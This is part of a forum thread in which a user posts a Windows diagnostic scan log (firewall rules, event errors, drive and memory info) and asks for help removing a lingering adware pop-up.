FirewallRules: [{EAF8FD7F-EB75-4956-BB68-EE445CF000BD}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{6A7BD87B-FDB9-471D-B837-5F0CA0AF25FC}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{64E8DD44-72B5-4C87-BA09-FF3B66B3DB69}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{93E9A304-F197-49D0-88F2-6D93E7EE2575}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{4728773D-FDC8-4CEB-93E2-C9F61D930CB0}C:\program files (x86)\steam\steamapps\common\the incredible adventures of van helsing final cut\vanhelsing_x64_11_win10.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the incredible adventures of van helsing final cut\vanhelsing_x64_11_win10.exe
FirewallRules: [UDP Query User{8DCDDAD5-23D7-444A-846C-FD0CDDE26606}C:\program files (x86)\steam\steamapps\common\the incredible adventures of van helsing final cut\vanhelsing_x64_11_win10.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the incredible adventures of van helsing final cut\vanhelsing_x64_11_win10.exe
FirewallRules: [TCP Query User{3B785730-0933-4217-B41C-0F32C6F71E72}C:\gravity\metal assault\_mas.exe] => (Allow) C:\gravity\metal assault\_mas.exe
FirewallRules: [UDP Query User{E5185BFE-2AAD-4DA2-A8E0-09054DA05AAC}C:\gravity\metal assault\_mas.exe] => (Allow) C:\gravity\metal assault\_mas.exe
FirewallRules: [{8348B51C-1C6E-4B30-85DA-05CBE5BA56A3}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{3859AC58-5AAB-466E-A2C6-FBEDCBE84D86}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{198842D4-19CE-4F8F-AC3D-3A9C9A4314A4}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{F7085040-A7D3-46C0-A6BF-E8BD17EE37F3}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{346E14B8-7417-49C5-972E-3B37DF4EFAA0}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{0CB777D8-C22F-4ECD-A1FE-AF435257126A}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{92811DDD-364A-4AAA-A771-BAA200791A47}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{D55DC355-EDF5-41B2-AF4D-950A6EA041B3}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{16FCA779-C8C6-487F-AD57-8711B547CE28}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{EF5805E9-F9EA-441C-9EA4-6C43FEA1C48E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{605DCB0A-602D-4B6F-A32D-8920AA6F3F54}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{E990AAAA-39C1-4A24-8425-4CA838C5C95E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{5F9E07AA-0CEB-44C0-A5D8-D52D66EC5AF4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{B892D7FD-AF12-4992-92F2-36E42D0C1819}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{27CEEF2E-0499-4454-BB13-0BB623A779D6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{8A1D2AC0-9996-49C5-8476-4ACED39DB85C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{6073E1D9-B584-4487-81BB-F57A3E955133}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{68A3A141-50A2-4129-B525-3EC138B291C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{E24C04F6-5B3B-4D33-A65E-40F569775347}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{0EFF19AE-31B9-4C17-BE44-9394E410BAD3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{3FDFB0EB-EC6B-4FBE-9A4C-9FC48723CAD4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [TCP Query User{9CA87EC9-E448-4BBF-9CCB-BE988B049CD3}D:\catia\intel_a\code\bin\cnext.exe] => (Allow) D:\catia\intel_a\code\bin\cnext.exe
FirewallRules: [UDP Query User{501E8688-2790-4D7A-9025-9E85B66DA65E}D:\catia\intel_a\code\bin\cnext.exe] => (Allow) D:\catia\intel_a\code\bin\cnext.exe
FirewallRules: [{47119E49-B854-42F1-8877-762A6DA42690}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{8A9B979B-B702-4B1F-AADF-4AF65D5A72D9}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{6F6E231B-25F0-423D-90DE-B19F2AF59FC7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{EF28E611-3211-4134-950A-5AEE73D98FB7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{ADCAEBB3-0D6D-40B1-8B17-C82EFC2CCD3A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{D8D4BE7C-6815-4933-87EB-522FA7990BBC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{3262B55A-0D53-4D72-8645-C92CEB8782C9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8D7EEE67-A924-4CEF-BA8A-3DFC4FD0CC50}] => (Allow) D:\7coop\Black Desert\bin\BlackDesert32.exe
FirewallRules: [{27F03A13-1C9A-4683-90B3-BFB35FB454D8}] => (Allow) D:\7coop\Black Desert\bin64\BlackDesert64.exe
FirewallRules: [{1D411FC5-BD54-4857-AF9C-0A50CD38A986}] => (Allow) D:\7coop\Black Desert\BlackDesert_Launcher.exe
FirewallRules: [{48C20724-187C-4C92-B288-28BF0ED03E32}] => (Allow) D:\7coop\Black Desert\BlackDesert_Downloader.exe
FirewallRules: [{ECEFC96A-6FF3-4E79-87F3-98BDB0ED75F2}] => (Allow) D:\7coop\Black Desert\BlackDesert_Launcher.exe
FirewallRules: [{25ED5881-72D8-4C72-A598-35B65CF520FB}] => (Allow) D:\7coop\Black Desert\BlackDesert_Launcher.exe
FirewallRules: [{47654C0D-8B84-4466-9565-B480BD85BF23}] => (Allow) D:\7coop\Black Desert\BlackDesert_Downloader.exe
FirewallRules: [{C035D913-9638-472F-986D-11D515A64677}] => (Allow) D:\7coop\Black Desert\BlackDesert_Downloader.exe
FirewallRules: [{80C7715E-E616-4AA4-9BDE-8AB292651F63}] => (Allow) D:\7coop\Black Desert\BlackDesert_Launcher.exe
FirewallRules: [TCP Query User{EFB317AF-AF29-40A5-B46E-7D3728D85E8D}C:\users\taurus silver\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\users\taurus silver\appdata\roaming\bittorrent\bittorrent.exe
FirewallRules: [UDP Query User{C204C617-8098-432F-8B2D-3BBD20F6C05C}C:\users\taurus silver\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\users\taurus silver\appdata\roaming\bittorrent\bittorrent.exe
FirewallRules: [TCP Query User{39105BB1-B79A-4A11-851D-B7379FDCD8ED}C:\program files (x86)\internet download manager\idman.exe] => (Allow) C:\program files (x86)\internet download manager\idman.exe
FirewallRules: [UDP Query User{A44B8369-FB4B-4529-B512-33AA8EDA93B0}C:\program files (x86)\internet download manager\idman.exe] => (Allow) C:\program files (x86)\internet download manager\idman.exe
FirewallRules: [{123B3FE2-F3A6-4FBA-9565-ED51A36B6614}] => (Allow) C:\Users\taurus silver\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{EC2FBD6E-1755-49EE-860D-5A40F7D75C05}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{5AD3394E-EE45-4BC7-A00C-887C32B8DBB0}] => (Allow) LPort=2869
FirewallRules: [{21104A78-EE13-43EC-92FA-97D50EAF19F6}] => (Allow) LPort=1900
FirewallRules: [{40E9CD68-0B38-450A-AB2D-8BF98885027A}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{77D4B01A-2878-4811-82DF-2FB2141058DB}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{B0EDDC8C-46D2-4666-8EFC-3EDD431F3A2A}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{57D80AC7-57EE-49AD-9E71-D47BA6AAC997}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{0962CBA8-4B98-4866-9146-5BD1224058C9}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{CE447477-669E-41BF-B601-F3AB07461F0B}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{85B08B11-1A31-4F3A-B55B-5FE603900EE7}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{1C3E895C-D7D0-49DD-B52C-A632C62638D1}] => (Allow) D:\7coop\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{35BCB42C-73A8-4665-BB27-BBB3D1675A1D}] => (Allow) D:\7coop\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{D5D5C8CE-EDB6-498C-A912-B395EE98167A}] => (Allow) C:\Users\taurus silver\AppData\Roaming\Nox\bin\Nox.exe
FirewallRules: [{56C8B97F-A608-4324-A4EB-32FEDE87B9E1}] => (Allow) C:\Program Files\Bignox\BigNoxVM\RTNoxVMHandle.exe
FirewallRules: [{DD457E9D-223B-4438-8247-012494E82541}] => (Allow) C:\Program Files\SoftEther VPN Client Manager\vpncmgr_x64.exe
FirewallRules: [{5D596396-D0C1-4B6E-A60E-320A79BB5B59}] => (Allow) C:\Program Files\SoftEther VPN Client Manager\vpncmd_x64.exe
FirewallRules: [{C169D2BB-7606-4A63-BC70-DD0C28054BA7}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient.exe
FirewallRules: [{665B67D4-9B7A-4B3D-888F-7BEB0C5ED9CF}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
FirewallRules: [{5CA15B8B-610E-4C33-8825-134100BB8A27}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr.exe
FirewallRules: [{34B85E76-C9B1-4D52-BF05-01E106B2A203}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe
FirewallRules: [{F735039E-FEF8-44FC-BA59-BAD198BDD46A}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd.exe
FirewallRules: [{28851842-9207-4081-BC09-2D4290DFC26C}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd_x64.exe
FirewallRules: [{E5701367-E20C-458C-8492-7E5D983A93F7}] => (Block) %ProgramFiles% (x86)\Avira\VPN\Avira.NetworkBlocker.exe
FirewallRules: [{C1BC47ED-C496-46FA-8EC6-534089B80053}] => (Block) %ProgramFiles% (x86)\Avira\VPN\Avira.VpnService.exe
FirewallRules: [{43E3AE04-8B24-4436-AB85-8C29FACA0B8D}] => (Block) %ProgramFiles% (x86)\Avira\VPN\Avira.WebAppHost.exe
FirewallRules: [{55CA104A-44A2-4CD1-A098-20078A5DF4C9}] => (Block) %ProgramFiles% (x86)\Avira\VPN\OpenVpn\openvpn.exe
FirewallRules: [{249D0009-A32B-40D2-BEAF-2C83A5242621}] => (Allow) C:\WINDOWS\explorer.exe
FirewallRules: [{CFF2325D-1C1E-460B-9DB8-53F07D8CFE92}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{271DC2EF-A038-4A94-9598-037A7853D74D}] => (Allow) D:\7coop\Vendetta Gaming Network\Twin Saga Vendetta\patcher.exe
FirewallRules: [{D8C57B25-D1A2-46CF-A4E9-03D22EBBE734}] => (Allow) C:\Users\taurus silver\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{576529A1-CC8A-447F-A81B-A97A48897B98}] => (Allow) C:\Users\taurus silver\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{CDDB9E56-C703-4E76-8857-6B14E47EFFD1}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{06A079D8-D11C-4DA4-A8A3-E702F29A9DB5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0F9ADCF0-87EF-4AE5-82E2-F1F208A7F3B5}] => (Allow) D:\7coop\steamapps\common\Paladins\Binaries\Win32\HirezBridge.exe
FirewallRules: [{BFC507C6-2666-4C03-88BB-625D7972EBE3}] => (Allow) D:\7coop\steamapps\common\Paladins\Binaries\Win32\HirezBridge.exe
FirewallRules: [{B7B1726E-C428-4651-B413-EA277D395A07}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{D41F16DD-6DEF-4646-8FF1-A51E38801128}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{2D9D876B-FF50-4CBA-A5C2-655C6FBED13E}] => (Allow) D:\Vendetta Gaming Network\Twin Saga Vendetta\patcher.exe
FirewallRules: [{54CCA648-33C1-4FDF-819B-77C5208E4017}] => (Allow) D:\Vendetta Gaming Network\Twin Saga Vendetta\game.bin
FirewallRules: [{F06DF093-0ABC-4ABF-895A-8B43CB2EC300}] => (Allow) D:\Vendetta Gaming Network\Twin Saga Vendetta\game.bin
 
==================== Restore Points =========================
 
29-10-2016 01:23:36 Scheduled Checkpoint
13-11-2016 21:59:29 Removed Aeria Ignite
24-11-2016 18:37:15 Installed Metal Assault
27-11-2016 23:04:00 Removed ESET Smart Security
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/28/2016 04:31:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NvStreamUserAgent.exe, version: 7.1.2084.9592, time stamp: 0x57605c64
Faulting module name: ntdll.dll, version: 10.0.10586.306, time stamp: 0x571af2eb
Exception code: 0xc0000005
Fault offset: 0x000000000002e909
Faulting process id: 0x1084
Faulting application start time: 0x01d248ed2aeb7a60
Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: a4cb65b1-3484-49ac-8760-e46e9306eaf4
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (11/28/2016 04:30:48 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 04:27:06 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program egui.exe version 9.0.407.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 11d4
 
Start Time: 01d248ec0a35912a
 
Termination Time: 60000
 
Application Path: C:\Program Files\ESET\ESET Smart Security\egui.exe
 
Report Id: b056483e-b4df-11e6-834e-08626654ee0c
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (11/28/2016 04:22:02 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 04:15:55 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 04:11:39 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 03:37:37 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (11/28/2016 03:27:29 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program MSASCui.exe version 4.9.10586.494 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 2500
 
Start Time: 01d248e2a5e3a4dd
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\Windows Defender\MSASCui.exe
 
Report Id: 8842132a-b4d7-11e6-834a-08626654ee0c
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (11/28/2016 03:12:32 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NvStreamUserAgent.exe, version: 7.1.2084.9592, time stamp: 0x57605c64
Faulting module name: ntdll.dll, version: 10.0.10586.306, time stamp: 0x571af2eb
Exception code: 0xc0000005
Fault offset: 0x000000000002e909
Faulting process id: 0x1514
Faulting application start time: 0x01d248e22ae8ac16
Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 810755cd-6213-428f-8c8a-7d578c461961
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (11/28/2016 03:11:52 AM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
 
System errors:
=============
Error: (11/28/2016 04:32:26 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {5DC4F9AD-3A2B-4DF4-AC39-3FF5A19FCF4C} did not register with DCOM within the required timeout.
 
Error: (11/28/2016 04:31:56 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {5DC4F9AD-3A2B-4DF4-AC39-3FF5A19FCF4C} did not register with DCOM within the required timeout.
 
Error: (11/28/2016 04:30:49 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The SysMain service terminated with the following error: 
Access is denied.
 
Error: (11/28/2016 04:30:49 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Thibechmerciph service terminated with the following error: 
The specified module could not be found.
 
Error: (11/28/2016 04:30:47 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: This computer is configured as a member of a workgroup, not as
a member of a domain. The Netlogon service does not need to run in this
configuration.
 
Error: (11/28/2016 04:30:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_7fbf6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (11/28/2016 04:30:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_7fbf6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (11/28/2016 04:30:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_7fbf6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (11/28/2016 04:30:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_7fbf6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (11/28/2016 04:23:42 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {5DC4F9AD-3A2B-4DF4-AC39-3FF5A19FCF4C} did not register with DCOM within the required timeout.
 
 
CodeIntegrity:
===================================
  Date: 2016-11-28 03:12:54.858
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-28 00:54:23.161
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-10-17 14:17:01.415
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-10 00:21:16.213
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-08 22:55:32.868
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-05 14:52:18.325
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-05 08:13:42.847
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-08-29 19:59:05.225
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-08-12 10:15:29.282
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-08-10 23:28:51.649
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-5500U CPU @ 2.40GHz
Percentage of memory in use: 32%
Total physical RAM: 12190.58 MB
Available physical RAM: 8241.27 MB
Total Virtual: 14110.58 MB
Available Virtual: 10346.96 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:186.3 GB) (Free:38.5 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:258.35 GB) (Free:74 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 749E2C35)
 
Partition: GPT.
 
========================================================
Disk: 1 (Size: 22.4 GB) (Disk ID: 749E2C19)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

  • 0

#4
uwek007


Please help me to get rid of this pop-up. Thank you.


  • 0

#5
uwek007


I ran some of the MBAM and AdwCleaner. Now only this one pop-up is left.
1.png

 

So how do I clear only this one above?


  • 0





